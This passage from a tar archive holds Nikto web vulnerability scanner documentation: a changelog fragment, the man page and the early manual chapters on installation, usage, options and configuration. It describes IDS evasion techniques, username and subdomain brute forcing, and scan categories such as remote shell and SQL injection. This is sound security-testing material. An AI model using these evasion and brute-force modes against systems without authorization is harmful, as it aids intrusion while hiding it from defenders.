now) - added ability for nikto to auto-determine ssl v non-ssl on a port - added port scanning ability (with or without nmap) - added ability to send message via the update script's versions.txt file. I don't know why, but it may be handy to let folks know if a new beta is out, or something. - implemented the virtual host headers as patched by Pasi Eronen 01.17.2002 Nikto 1.018 - Added /mpcgi/ to the @CGIDIRS array based on some suggestions. - Fixed a bug in the auth_check function (thanks RFP), and cleaned up error reporting on failed auths 01.12.2002 Nikto 1.017 - Fixed a bug where the data portion of a request did not reset to null after some checks (thanks to Phil Brass for pointing me at it & letting me test against his server). 01.10.2002 Nikto 1.016 - Add dump_*hash functions - Added pause (-x) in scan loop - Fixed a bug which caused a major slowdown - Added load_conf for setup for configuration files (future) - Fixed http vs. https links in output files 01.08.2002 Nikto 1.015 - Fixed a bug (?) in Libwhisker PR4 (will check v1 code...) - Corrected an error which caused a few false-positives (404 really IS not found :) 01.07.2002 Nikto 1.014 - Removed comment filtering from lines in scan_database.db to accommodate SSI includes - Fixed quoting removal for data portions in checks (so " is valid). 01.06.2002 Nikto 1.013 - Made major globabl variable changes, moved tons of them to hashes - Wrote some basic plugin writing documentation & added 'docs' directory 01.03.2002 Nikto 1.012 - Added extended output for scan archival reasons (suggested by Steve Saady) - Changed host auth failure to a warning, not stoppage - Added "data" portion to scan_database.db - Added @IP and @HOSTNAME substitutions for scan_database.db checks (will be replaced by actual IP/hostname) - in case they are needed in the future. - Added JUNK() to scan_database.db checks to facilitate future buffer-overflows (non-DoS), and future DoS plugins - Added Proxy-agent as valid the same as Server result strings - Changed -l to -n ("nolookup") to be more accurate 01.02.2002 Nikto 1.011 - Added proxy auth for db update requests (oops). - Started .xxx version numbering scheme to make life easier - Fixed href tags in HTM output (< and > encoding and target host/ip) - Added "caseless" WWW-Authenticate finding (for iPlanet Proxy) 12.31.2001 Nikto 1.01 - Added regex to remove comments from scan_database.db in case they ever exist - Fixed extra 'Host:' line being sent to server (duh). - Fixed non 'GET' request data posting (duh). - Added -timeout option 12.27.2001 Nikto 1.00 - Finalized beta version for release ������������������������������������������������������������������������������������������������������������������������������������������nikto-2.1.5/docs/nikto.1����������������������������������������������������������������������������0000644�0000000�0000000�00000023144�11416271170�013503� 0����������������������������������������������������������������������������������������������������ustar �root����������������������������root�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������.\" Title: nikto .\" Author: .\" Generator: DocBook XSL Stylesheets v1.73.2 <http://docbook.sf.net/> .\" Date: 01/19/2010 .\" Manual: .\" Source: .\" .TH "NIKTO" "1" "01/19/2010" "" "" .\" disable hyphenation .nh .\" disable justification (adjust text to left margin only) .ad l .SH "NAME" nikto \- Scan web server for known vulnerabilities .SH "SYNOPSIS" .HP 21 \fB/usr/local/bin/nikto\fR [options...] .SH "DESCRIPTION" .PP Examine a web server to find potential problems and security vulnerabilities, including: .sp .RS 4 \h'-04'\(bu\h'+03'Server and software misconfigurations .RE .sp .RS 4 \h'-04'\(bu\h'+03'Default files and programs .RE .sp .RS 4 \h'-04'\(bu\h'+03'Insecure files and programs .RE .sp .RS 4 \h'-04'\(bu\h'+03'Outdated servers and programs .RE .PP Nikto is built on LibWhisker (by RFP) and can run on any platform which has a Perl environment\&. It supports SSL, proxies, host authentication, IDS evasion and more\&. It can be updated automatically from the command\-line, and supports the optional submission of updated version data back to the maintainers\&. .SH "OPTIONS" .PP Below are all of the Nikto command line options and explanations\&. A brief version of this text is available by running Nikto with the \-h (\-help) option\&. .PP \fB\-Cgidirs\fR .RS 4 Scan these CGI directories\&. Special words "none" or "all" may be used to scan all CGI directories or none, (respectively)\&. A literal value for a CGI directory such as "/cgi\-test/" may be specified (must include trailing slash)\&. If this is option is not specified, all CGI directories listed in config\&.txt will be tested\&. .RE .PP \fB\-config\fR .RS 4 Specify an alternative config file to use instead of the config\&.txt located in the install directory\&. .RE .PP \fB\-dbcheck\fR .RS 4 Check the scan databases for syntax errors\&. .RE .PP \fB\-Display\fR .RS 4 Control the output that Nikto shows\&. See Chapter 5 for detailed information on these options\&. Use the reference number or letter to specify the type, multiple may be used: .sp 1 \- Show redirects .sp 2 \- Show cookies received .sp 3 \- Show all 200/OK responses .sp 4 \- Show URLs which require authentication .sp D \- Debug Output .sp V \- Verbose Output .RE .PP \fB\-evasion\fR .RS 4 Specify the LibWhisker IDS evasion technique to use (see the LibWhisker docs for detailed information on these)\&. Use the reference number to specify the type, multiple may be used: .sp 1 \- Random URI encoding (non\-UTF8) .sp 2 \- Directory self\-reference (/\&./) .sp 3 \- Premature URL ending .sp 4 \- Prepend long random string .sp 5 \- Fake parameter .sp 6 \- TAB as request spacer .sp 7 \- Change the case of the URL .sp 8 \- Use Windows directory separator (\e) .RE .PP \fB\-findonly\fR .RS 4 Only discover the HTTP(S) ports, do not perform a security scan\&. This will attempt to connect with HTTP or HTTPS, and report the Server header\&. .RE .PP \fB\-Format\fR .RS 4 Save the output file specified with \-o (\-output) option in this format\&. If not specified, the default will be taken from the file extension specified in the \-output option\&. Valid formats are: .sp csv \- a comma\-seperated list .sp htm \- an HTML report .sp txt \- a text report .sp xml \- an XML report .RE .PP \fB\-host\fR .RS 4 Host(s) to target\&. Can be an IP address, hostname or text file of hosts\&. A single dash (\-) maybe used for stdout\&. Can also parse nmap \-oG style output .RE .PP \fB\-Help\fR .RS 4 Display extended help information\&. .RE .PP \fB\-id\fR .RS 4 ID and password to use for host Basic host authentication\&. Format is "id:password"\&. .RE .PP \fB\-list\-plugins\fR .RS 4 Will list all plugins that Nikto can run against targets and then will exit without performing a scan\&. These can be tuned for a session using the \-plugins option\&. .sp The output format is: .sp Plugin \fIname\fR .sp \ \&\fIfull name\fR \- \fIdescription\fR .sp \ \&Written by \fIauthor\fR, Copyright (C) \fIcopyright\fR .RE .PP \fB\-mutate\fR .RS 4 Specify mutation technique\&. A mutation will cause Nikto to combine tests or attempt to guess values\&. These techniques may cause a tremendous amount of tests to be launched against the target\&. Use the reference number to specify the type, multiple may be used: .sp 1 \- Test all files with all root directories .sp 2 \- Guess for password file names .sp 3 \- Enumerate user names via Apache (/~user type requests) .sp 4 \- Enumerate user names via cgiwrap (/cgi\-bin/cgiwrap/~user type requests) .sp 5 \- Attempt to brute force sub\-domain names, assume that the host name is the parent domain .sp 6 \- Attempt to guess directory names from the supplied dictionary file .RE .PP \fB\-mutate\-options\fR .RS 4 Provide extra information for mutates, e\&.g\&. a dictionary file .RE .PP \fB\-nolookup\fR .RS 4 Do not perform name lookups on IP addresses\&. .RE .PP \fB\-nossl\fR .RS 4 Do not use SSL to connect to the server\&. .RE .PP \fB\-no404\fR .RS 4 Disable 404 (file not found) checking\&. This will reduce the total number of requests made to the webserver and may be preferable when checking a server over a slow link, or an embedded device\&. This will generally lead to more false positives being discovered\&. .RE .PP \fB\-output\fR .RS 4 Write output to the file specified\&. The format used will be taken from the file extension\&. This can be over\-riden by using the \-Format option (e\&.g\&. to write text files with a different extenstion\&. Existing files will have new information appended\&. .RE .PP \fB\-plugins\fR .RS 4 Select which plugins will be run on the specified targets\&. A comma separated list should be provided which lists the names of the plugins\&. The names can be found by using \-list\-plugins\&. .sp There are two special entries: ALL, which specifies all plugins shall be run and NONE, which specifies no plugins shall be run\&. The default is ALL .RE .PP \fB\-port\fR .RS 4 TCP port(s) to target\&. To test more than one port on the same host, specify the list of ports in the \-p (\-port) option\&. Ports can be specified as a range (i\&.e\&., 80\-90), or as a comma\-delimited list, (i\&.e\&., 80,88,90)\&. If not specified, port 80 is used\&. .RE .PP \fB\-Pause\fR .RS 4 Seconds to delay between each test\&. .RE .PP \fB\-root\fR .RS 4 Prepend the value specified to the beginning of every request\&. This is useful to test applications or web servers which have all of their files under a certain directory\&. .RE .PP \fB\-ssl\fR .RS 4 Only test SSL on the ports specified\&. Using this option will dramatically speed up requests to HTTPS ports, since otherwise the HTTP request will have to timeout first\&. .RE .PP \fB\-Single\fR .RS 4 Perform a single request to a target server\&. Nikto will prompt for all options which can be specified, and then report the detailed output\&. See Chapter 5 for detailed information\&. .RE .PP \fB\-timeout\fR .RS 4 Seconds to wait before timing out a request\&. Default timeout is 10 seconds\&. .RE .PP \fB\-Tuning\fR .RS 4 Tuning options will control the test that Nikto will use against a target\&. By default, if any options are specified, only those tests will be performed\&. If the "x" option is used, it will reverse the logic and exclude only those tests\&. Use the reference number or letter to specify the type, multiple may be used: .sp 0 \- File Upload .sp 1 \- Interesting File / Seen in logs .sp 2 \- Misconfiguration / Default File .sp 3 \- Information Disclosure .sp 4 \- Injection (XSS/Script/HTML) .sp 5 \- Remote File Retrieval \- Inside Web Root .sp 6 \- Denial of Service .sp 7 \- Remote File Retrieval \- Server Wide .sp 8 \- Command Execution / Remote Shell .sp 9 \- SQL Injection .sp a \- Authentication Bypass .sp b \- Software Identification .sp c \- Remote Source Inclusion .sp x \- Reverse Tuning Options (i\&.e\&., include all except specified) .sp The given string will be parsed from left to right, any x characters will apply to all characters to the right of the character\&. .RE .PP \fB\-useproxy\fR .RS 4 Use the HTTP proxy defined in the configuration file\&. .RE .PP \fB\-update\fR .RS 4 Update the plugins and databases directly from cirt\&.net\&. .RE .PP \fB\-Version\fR .RS 4 Display the Nikto software, plugin and database versions\&. .RE .PP \fB\-vhost\fR .RS 4 Specify the Host header to be sent to the target\&. .RE .SH "FILES" .PP \fInikto\&.conf\fR .RS 4 The Nikto configuration file\&. This sets Nikto\'s global options\&. Several nikto\&.conf files may exist and are parsed in the below order\&. As each configuration file is loaded is supersedes any previously set configuration: .sp .RS 4 \h'-04'\(bu\h'+03'System wide (e\&.g\&. /etc/nikto\&.conf) .RE .sp .RS 4 \h'-04'\(bu\h'+03'Home directory (e\&.g\&. $HOME/nikto\&.conf) .RE .sp .RS 4 \h'-04'\(bu\h'+03'Current directory (e\&.g\&. \&./nikto\&.conf) .RE .RE .PP \fI${NIKTO_DIR}/plugins/db*\fR .RS 4 db files are the databases that nikto uses to check for vulnerabilities and issues within the web server\&. .RE .PP \fI${NIKTO_DIR}/plugins/*\&.plugin\fR .RS 4 All nikto\'s plugins exist here\&. Nikto itself is just a wrapper script to manage CLI and pass through to the plugins\&. .RE .PP \fI${NIKTO_DIR}/templates\fR .RS 4 Contains the templates for nikto\'s output formats\&. .RE .SH "BUGS" .PP The current features are not supported: .sp .RS 4 \h'-04'\(bu\h'+03'SOCKS Proxies .RE .SH "AUTHORS" .PP Nikto was originally written and maintained by Sullo, CIRT, Inc\&. It is currently maintained by David Lodge\&. See the main documentation for other contributors\&. .PP All code is (C) CIRT, Inc\&., except LibWhisker which is (C) rfp\&.labs (wiretrip\&.net)\&. Other portions of code may be (C) as specified\&. .SH "SEE ALSO" .PP \fINikto Homepage\fR\&[1] .SH "NOTES" .IP " 1." 4 Nikto Homepage .RS 4 \%http://www.cirt.net/ .RE ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������nikto-2.1.5/docs/nikto_manual.html������������������������������������������������������������������0000644�0000000�0000000�00000326336�11325432062�015653� 0����������������������������������������������������������������������������������������������������ustar �root����������������������������root�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<html><head><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>Nikto v2.1.0 - The Manual

Nikto v2.1.0 - The Manual

Table of Contents

1. Introduction
Overview
Description
Advanced Error Detection Logic
History
2. Installation
Requirements
Install
3. Usage
Basic Testing
Multiple Port Testing
Multiple Host Testing
Using a Proxy
Updating
Integration with Nessus
4. Command Line Options
All Options
Mutation Techniques
Display
Scan Tuning
Single Request Mode
5. Configuration Files
Location
Format
Variables
6. Output and Reports
Export Formats
HTML and XML Customisation
7. Test and Code Writing
Scan Database Field Values
User-Defined Tests
Scan Database Syntax
Plugins
Initialisation Phase
Reconnaisance Phase
Scan Phase
Reporting Phase
Data Structures
Standard Methods
Global Variables
Test Identifiers
Code Copyrights
8. Troubleshooting
SOCKS Proxies
Debugging
9. Licences
Nikto
LibWhisker
Tests
10. Credits
Nikto
Thanks

List of Tables

7.1. Scan Database Fields
7.2. Members of the Mark structure
7.3. Members of the Vulnerability structure
7.4. Members of the cache structure
7.5. TID Scheme

List of Examples

3.1. Valid Hosts File
7.1. Example initialisation function

Chapter 1. Introduction

Table of Contents

Overview
Description
Advanced Error Detection Logic
History

Overview

Nikto is a web server assessment tool. It is designed to find various default and insecure files, configurations and programs on any type of web server.

Description

Examine a web server to find potential problems and security vulnerabilities, including:

  • Server and software misconfigurations

  • Default files and programs

  • Insecure files and programs

  • Outdated servers and programs

Nikto is built on LibWhisker (by RFP) and can run on any platform which has a PERL environment. It supports SSL, proxies, host authentication, IDS evasion and more. It can be updated automatically from the command-line, and supports the optional submission of updated version data back to the maintainers.

The name "Nikto" is taken from the movie "The Day the Earth Stood Still", and of course subsequent abuse by Bruce Campbell in "Army of Darkness". More information on the pop-culture popularity of Nikto can be found at http://www.blather.net/blather/2005/10/klaatu_barada_nikto_the_day_th.html

Advanced Error Detection Logic

Most web security tools, (including Nikto 1.32 and below), rely heavily on the HTTP response to determine if a page or script exists on the target. Because many servers do not properly adhere to RFC standards and return a 200 "OK" response for requests which are not found or forbidden, this can lead to many false-positives. In addition, error responses for various file extensions can differ--the "not found" response for a .html file is often different than a .cgi.

Some testing tools, such as Nessus, also look at the content of the response to help eliminate these false positives. While often effective, this method relies on pre-defined strings to help eliminate false positives.

As of version 2.0 Nikto no longer assumes the error pages for different file types will be the same. A list of unique file extensions is generated at run-time (from the test database), and each of those extensions is tested against the target. For every file type, the "best method" of determining errors is found: standard RFC response, content match or MD4 hash (in decreasing order of preference). This allows Nikto to use the fastest and most accurate method for each individual file type, and therefore help eliminate the false positives seen for some servers in version 1.32 and below.

For example, if a server responds with a 404 "not found" error for a non-existent .txt file, Nikto will match the HTTP response of "404" on tests. If the server responds with a 200 "OK" response, it will try to match on the content, and assuming it finds a match (for example, the words "could not be found"), it will use this method for determining missing .txt files. If the other methods fail, Nikto will attempt to remove date and time strings (which can constantly change) from the returned page's content, generate an MD5 hash of the content, and then match that hash value against future .txt tests. The latter is by far the slowest type of match, but in many cases will provide valid results for a particular file type.

History

The Nikto 1.00 Beta was released on December 27, 2001, (followed almost immediately by the 1.01 release). Over the course of two years Nikto's code evolved into the most popular freely available web vulnerability scanner. The 2.0 release, in November, 2007 represents several years of improvements.

In 2008, due to other commitments, Sullo, the original author couldn't continue to support Nikto and the code was released under the GPL and passed to the community for support.

Chapter 2. Installation

Table of Contents

Requirements
Install

Requirements

Any system which supports a basic PERL installation should allow Nikto to run. It has been extensively tested on:

  • Windows (using ActiveState Perl)

  • Mac OSX

  • Various Linux and Unix installations (including RedHat, Solaris, Debian, Knoppix, etc.)

The only required PERL module that does not come standard is LibWhisker. Nikto comes with and is configured to use a local LW.pm file (in the plugins directory), but users may wish to change Nikto to use a version installed on the system. See Section 2 for further information.

For SSL support the Net::SSLeay PERL module must be installed (which in turn requires OpenSSL on the Unix platform). Windows support for SSL is dependent on the installation package, but is rumored to exist for ActiveState's Perl.

The nmap scanner can also be used, if desired. In some cases using nmap will slow down Nikto execution, as it must call an external program. For scanning many ports across one or more servers, using nmap will be faster than using Nikto's internal PERL scanning.

Install

These instructions do not include information on installing PERL, PERL Modules, OpenSSL, LibWhisker or any of the utilities that may be needed during installation (such as gzip, tar, etc.). Please see the distributor's documentation for information on how to install and configure those software packages.

Unpack the download file:

tar -xvfz nikto-current.tar.gz

Assuming a standard OS/PERL installation, Nikto should now be usable. See Chapter 4 (Options) or Chapter 8 (Troubleshooting) for further configuration information.

Chapter 3. Usage

Table of Contents

Basic Testing
Multiple Port Testing
Multiple Host Testing
Using a Proxy
Updating
Integration with Nessus

Basic Testing

The most basic Nikto scan requires simply a host to target, since port 80 is assumed if none is specified. The host can either be an IP or a hostname of a machine, and is specified using the -h (-host) option. This will scan the IP 192.168.0.1 on TCP port 80:

perl nikto.pl -h 192.168.0.1

To check on a different port, specify the port number with the -p (-port) option. This will scan the IP 192.168.0.1 on TCP port 443:

perl nikto.pl -h 192.168.0.1 -p 443

Hosts, ports and protocols may also be specified by using a full URL syntax, and it will be scanned:

perl nikto.pl -h https://192.168.0.1:443/

There is no need to specify that port 443 may be SSL, as Nikto will first test regular HTTP and if that fails, HTTPS. If you are sure it is an SSL server, specifying -s (-ssl) will speed up the test.

perl nikto.pl -h 192.168.0.1 -p 443 -ssl
[Note]Note

-mutate 1 increases the number of tests so that all filenames are tested against all databases inc db_tests. This will produce over 2,000,000 extra tests, which will use up a massive amount of resource.

More complex tests can be performed using the -mutate parameter, as detailed later. This can produce extra tests, some of which may be provided with extra parameters through the -mutate-options parameter. For example, using -mutate 3, with or without a file attempts to brute force usernames if the web server allows ~user URIs:

perl nikto.pl -h 192.168.0.1 -mutate 3 -mutate-options user-list.txt

Multiple Port Testing

Nikto can scan multiple ports in the same scanning session. To test more than one port on the same host, specify the list of ports in the -p (-port) option. Ports can be specified as a range (i.e., 80-90), or as a comma-delimited list, (i.e., 80,88,90). This will scan the host on ports 80, 88 and 443.

perl nikto.pl -h 192.168.0.1 -p 80,88,443

Multiple Host Testing

Nikto support scanning multiple hosts in the same session via a text file of host names or IPs. Instead of giving a host name or IP for the -h (-host) option, a file name can be given. A file of hosts must be formatted as one host per line, with the port number(s) at the end of each line. Ports can be separated from the host and other ports via a colon or a comma. If no port is specified, port 80 is assumed.

This is an example of a valid hosts file:

Example 3.1. Valid Hosts File

192.168.0.1:80
http://192.168.0.1:8080/
192.168.0.3

[Note]Note

For win32 users: due to peculiaries in the way that cmd.exe works with pipes, the above example may not work for you. In this case a temporary file will have to be used to store the output from nmap

A host file may also be an nmap output in "greppable" format (i.e. from the output from -oG).

A file may be passed to Nikto through stdout/stdin using a "-" as the filename. For example:

nmap -p80 192.168.0.0/24 -oG - | nikto.pl -h -

Using a Proxy

If the machine running Nikto only has access to the target host (or update server) via an HTTP proxy, the test can still be performed. Set the PROXY* variables (as described in section 4), then execute Nikto with the -u (-useproxy) command. All connections will be relayed through the HTTP proxy specified in the configuration file.

perl nikto.pl -h 192.168.0.1 -p 80 -u

Updating

Nikto can be automatically updated, assuming you have Internet connectivity from the host Nikto is installed on. To update to the latest plugins and databases, simply run Nikto with the -update command.

[Note]Note

The -update option cannot be abbreviated.

perl nikto.pl -update

If updates are required, you will see a list of the files downloaded:

 perl nikto.pl -update
 + Retrieving 'nikto_core.plugin'
 + Retrieving 'CHANGES.txt'

Updates may also be manually downloaded from http://www.cirt.net/

Integration with Nessus

Nessus (http://www.nessus.org/nessus/) can be configured to automatically launch Nikto when it finds a web server. Ensure Nikto works properly, then place the directory containing nikto.pl in root's PATH environment variable. When nessusd starts, it should see the nikto.pl program and enable usage through the GUI.

Chapter 4. Command Line Options

Table of Contents

All Options
Mutation Techniques
Display
Scan Tuning
Single Request Mode

All Options

Below are all of the Nikto command line options and explanations. A brief version of this text is available by running Nikto with the -h (-help) option.

-Cgidirs

Scan these CGI directories. Special words "none" or "all" may be used to scan all CGI directories or none, (respectively). A literal value for a CGI directory such as "/cgi-test/" may be specified (must include trailing slash). If this is option is not specified, all CGI directories listed in config.txt will be tested.

-config

Specify an alternative config file to use instead of the config.txt located in the install directory.

-dbcheck

Check the scan databases for syntax errors.

-Display

Control the output that Nikto shows. See Chapter 5 for detailed information on these options. Use the reference number or letter to specify the type, multiple may be used:

1 - Show redirects

2 - Show cookies received

3 - Show all 200/OK responses

4 - Show URLs which require authentication

D - Debug Output

V - Verbose Output

-evasion

Specify the LibWhisker IDS evasion technique to use (see the LibWhisker docs for detailed information on these). Use the reference number to specify the type, multiple may be used:

1 - Random URI encoding (non-UTF8)

2 - Directory self-reference (/./)

3 - Premature URL ending

4 - Prepend long random string

5 - Fake parameter

6 - TAB as request spacer

7 - Change the case of the URL

8 - Use Windows directory separator (\)

-findonly

Only discover the HTTP(S) ports, do not perform a security scan. This will attempt to connect with HTTP or HTTPS, and report the Server header.

-Format

Save the output file specified with -o (-output) option in this format. If not specified, the default will be taken from the file extension specified in the -output option. Valid formats are:

csv - a comma-seperated list

htm - an HTML report

txt - a text report

xml - an XML report

-host

Host(s) to target. Can be an IP address, hostname or text file of hosts. A single dash (-) maybe used for stdout. Can also parse nmap -oG style output

-Help

Display extended help information.

-id

ID and password to use for host Basic host authentication. Format is "id:password".

-list-plugins

Will list all plugins that Nikto can run against targets and then will exit without performing a scan. These can be tuned for a session using the -plugins option.

The output format is:

Plugin name

 full name - description

 Written by author, Copyright (C) copyright

-mutate

Specify mutation technique. A mutation will cause Nikto to combine tests or attempt to guess values. These techniques may cause a tremendous amount of tests to be launched against the target. Use the reference number to specify the type, multiple may be used:

1 - Test all files with all root directories

2 - Guess for password file names

3 - Enumerate user names via Apache (/~user type requests)

4 - Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests)

5 - Attempt to brute force sub-domain names, assume that the host name is the parent domain

6 - Attempt to guess directory names from the supplied dictionary file

-mutate-options

Provide extra information for mutates, e.g. a dictionary file

-nolookup

Do not perform name lookups on IP addresses.

-nossl

Do not use SSL to connect to the server.

-no404

Disable 404 (file not found) checking. This will reduce the total number of requests made to the webserver and may be preferable when checking a server over a slow link, or an embedded device. This will generally lead to more false positives being discovered.

-output

Write output to the file specified. The format used will be taken from the file extension. This can be over-riden by using the -Format option (e.g. to write text files with a different extenstion. Existing files will have new information appended.

-plugins

Select which plugins will be run on the specified targets. A comma separated list should be provided which lists the names of the plugins. The names can be found by using -list-plugins.

There are two special entries: ALL, which specifies all plugins shall be run and NONE, which specifies no plugins shall be run. The default is ALL

-port

TCP port(s) to target. To test more than one port on the same host, specify the list of ports in the -p (-port) option. Ports can be specified as a range (i.e., 80-90), or as a comma-delimited list, (i.e., 80,88,90). If not specified, port 80 is used.

-Pause

Seconds to delay between each test.

-root

Prepend the value specified to the beginning of every request. This is useful to test applications or web servers which have all of their files under a certain directory.

-ssl

Only test SSL on the ports specified. Using this option will dramatically speed up requests to HTTPS ports, since otherwise the HTTP request will have to timeout first.

-Single

Perform a single request to a target server. Nikto will prompt for all options which can be specified, and then report the detailed output. See Chapter 5 for detailed information.

-timeout

Seconds to wait before timing out a request. Default timeout is 10 seconds.

-Tuning

Tuning options will control the test that Nikto will use against a target. By default, if any options are specified, only those tests will be performed. If the "x" option is used, it will reverse the logic and exclude only those tests. Use the reference number or letter to specify the type, multiple may be used:

0 - File Upload

1 - Interesting File / Seen in logs

2 - Misconfiguration / Default File

3 - Information Disclosure

4 - Injection (XSS/Script/HTML)

5 - Remote File Retrieval - Inside Web Root

6 - Denial of Service

7 - Remote File Retrieval - Server Wide

8 - Command Execution / Remote Shell

9 - SQL Injection

a - Authentication Bypass

b - Software Identification

c - Remote Source Inclusion

x - Reverse Tuning Options (i.e., include all except specified)

The given string will be parsed from left to right, any x characters will apply to all characters to the right of the character.

-useproxy

Use the HTTP proxy defined in the configuration file.

-update

Update the plugins and databases directly from cirt.net.

-Version

Display the Nikto software, plugin and database versions.

-vhost

Specify the Host header to be sent to the target.

Mutation Techniques

A mutation will cause Nikto to combine tests or attempt to guess values. These techniques may cause a tremendous amount of tests to be launched against the target. Use the reference number to specify the type, multiple may be combined.

  1. Test all files with all root directories. This takes each test and splits it into a list of files and directories. A scan list is then created by combining each file with each directory.

  2. Guess for password file names. Takes a list of common password file names (such as "passwd", "pass", "password") and file extensions ("txt", "pwd", "bak", etc.) and builds a list of files to check for.

  3. Enumerate user names via Apache (/~user type requests). Exploit a misconfiguration with Apache UserDir setups which allows valid user names to be discovered. This will attempt to brute-force guess user names. A file of known users can also be supplied by supplying the file name in the -mutate-options parameter.

  4. Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests). Exploit a flaw in cgiwrap which allows valid user names to be discovered. This will attempt to brute-force guess user names. A file of known users can also be supplied by supplying the file name in the -mutate-options parameter.

  5. Attempt to brute force sub-domain names. This will attempt to brute force know domain names, it will assume the given host (without a www) is the parent domain.

  6. Attempt to brute directory names. This is the only mutate option that requires a file to be passed in the -mutate-options parameter. It will use the given file to attempt to guess directory names. Lists of common directories may be found in the OWASP DirBuster project.

Display

By default only some basic information about the target and vulnerabilities is shown. Using the -Display parameter can produce more information for debugging issues.

  • 1 - Show redirects. This will display all requests which elicit a "redirect" response from the server.

  • 2 - Show cookies received. This will display all cookies that were sent by the remote host.

  • 3 - Show all 200/OK responses. This will show all responses which elicit an "okay" (200) response from the server. This could be useful for debugging.

  • 4 - Show URLs which require authentication. This will show all responses which elicit an "authorization required" header.

  • D - Debug Output. Show debug output, which shows the verbose output and extra information such as variable content.

  • V - Verbose Output. Show verbose output, which typically shows where Nikto is during program execution.

Scan Tuning

Scan tuning can be used to decrease the number of tests performed against a target. By specifying the type of test to include or exclude, faster, focused testing can be completed. This is useful in situations where the presence of certain file types are undesired -- such as XSS or simply "interesting" files.

Test types can be controlled at an individual level by specifying their identifier to the -T (-Tuning) option. In the default mode, if -T is invoked only the test type(s) specified will be executed. For example, only the tests for "Remote file retrieval" and "Command execution" can performed against the target:

perl nikto.pl -h 192.168.0.1 -T 58

If an "x" is passed to -T then this will negate all tests of types following the x. This is useful where a test may check several different types of exploit. For example:

perl nikto.pl -h 192.168.0.1 -T 58xb

The valid tuning options are:

  • 0 - File Upload. Exploits which allow a file to be uploaded to the target server.

  • 1 - Interesting File / Seen in logs. An unknown but suspicious file or attack that has been seen in web server logs (note: if you have information regarding any of these attacks, please contact CIRT, Inc.).

  • 2 - Misconfiguration / Default File. Default files or files which have been misconfigured in some manner. This could be documentation, or a resource which should be password protected.

  • 3 - Information Disclosure. A resource which reveals information about the target. This could be a file system path or account name.

  • 4 - Injection (XSS/Script/HTML). Any manner of injection, including cross site scripting (XSS) or content (HTML). This does not include command injection.

  • 5 - Remote File Retrieval - Inside Web Root. Resource allows remote users to retrieve unauthorized files from within the web server's root directory.

  • 6 - Denial of Service. Resource allows a denial of service against the target application, web server or host (note: no intentional DoS attacks are attempted).

  • 7 - Remote File Retrieval - Server Wide. Resource allows remote users to retrieve unauthorized files from anywhere on the target.

  • 8 - Command Execution / Remote Shell. Resource allows the user to execute a system command or spawn a remote shell.

  • 9 - SQL Injection. Any type of attack which allows SQL to be executed against a database.

  • a - Authentication Bypass. Allows client to access a resource it should not be allowed to access.

  • b - Software Identification. Installed software or program could be positively identified.

  • c - Remote source inclusion. Software allows remote inclusion of source code.

  • x - Reverse Tuning Options. Perform exclusion of the specified tuning type instead of inclusion of the specified tuning type.

Single Request Mode

Single request mode is designed to preform a solitary request against the target. This is useful to confirm a test result using the same resources Nikto used during a scan. The single option allows manual setting of most variables used by Nikto and LibWhisker, and upon completion will display both the request and the result of the operation.

Most options have a default value or can be left blank. The most common and required values are at the beginning of the "questions" section for slightly easier use. True and false are specified by numeric equivalents, 1 and 0 respectively. Please note that Single mode is not very user-friendly. Here is an example Nikto run with the -Single option.


[dave@yggdrasil nikto-2.03]$ ./nikto.pl -Single
--------------------------------------------  Nikto 2.1.0
--------------------------------------------  Single Request Mode
                              Hostname or IP: localhost
                                   Port (80):
                                     URI (/): /test.html
                                     SSL (0):
                                  Proxy host:
                                  Proxy port:
                      Show HTML Response (1):
                          HTTP Version (1.1):
                           HTTP Method (GET):
      User-Agent (Mozilla/4.75 (Nikto/2.1.0):
                     Connection (Keep-Alive):
                                        Data:
                        force_bodysnatch (0):
                             force_close (1):
                             http_space1 ( ):
                             http_space2 ( ):
                     include_host_in_uri (0):
           invalid_protocol_return_value (1):
                                max_size (0):
                             protocol (HTTP):
           require_newline_after_headers (0):
                                   retry (0):
                           ssl_save_info (0):
                                timeout (10):
                             uri_password ():
                              uri_postfix ():
                               uri_prefix ():
                                 uri_user ():
                         Enable Anti-IDS (0):
--------------------------------------------  Done with questions
        Host Name: localhost
        Host IP: 127.0.0.1
        HTTP Response Code: 404
--------------------------------------------  Connection Details
        Connection: Keep-Alive
        Host: localhost
        User-Agent: Mozilla/4.75 (Nikto/2.1.0
        data:
        force_bodysnatch: 0
        force_close: 1
        force_open: 0
        host: localhost
        http_space1:
        http_space2:
        ignore_duplicate_headers: 1
        include_host_in_uri: 0
        invalid_protocol_return_value: 1
        max_size: 0
        method: GET
        port: 80
        protocol: HTTP
        require_newline_after_headers: 0
        retry: 0
        ssl: 0
        ssl_save_info: 0
        timeout: 10
        trailing_slurp: 0
        uri: /test.html
        uri_param_sep: ?
        uri_postfix:
        uri_prefix:
        version: 1.1
--------------------------------------------  Response Headers
        Connection: close
        Content-Length: 268
        Content-Type: text/html; charset=iso-8859-1
        Date: Tue, 18 Aug 2009 10:13:57 GMT
        Server: Apache/2
        code: 404
        http_data_sent: 1
        http_eol:

        http_space1:
        http_space2:
        message: Not Found
        protocol: HTTP
        uri: /test.html
        version: 1.1
--------------------------------------------  Response Content
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /test.html was not found on this server.</p>
<hr>
<address>Apache/2 Server at localhost Port 80</address>
</body></html>

Chapter 5. Configuration Files

Table of Contents

Location
Format
Variables

Location

Nikto, like any non-trivial program needs to know a few things about how to work with the current environment. For most situations the default configuration file will work. Sometimes, tuning may be required, or some things may need to be changes.

Nikto will look for a configuration file in three places and if it finds one, will apply it in the strict order, listed below. A later found configuration file will overwrite any variables set in an earlier configuration file. The locations are:

  1. /etc/nikto.conf (this may be altered depending on platform)

  2. $HOME/nikto.conf

  3. nikto.conf

Format

The configuration files are formated like a standard Unix configuration file: blank lines are ignored, any line starting with a # is ignored, variables are set with VariableName=Value line.

Variables

The following variables may be set within the configuration file:

CLIOPTS

Default options that should always be passed to the command line. For example:

CLIOPTS=-output results.txt -Format text

Default Setting

CLIOPTS=
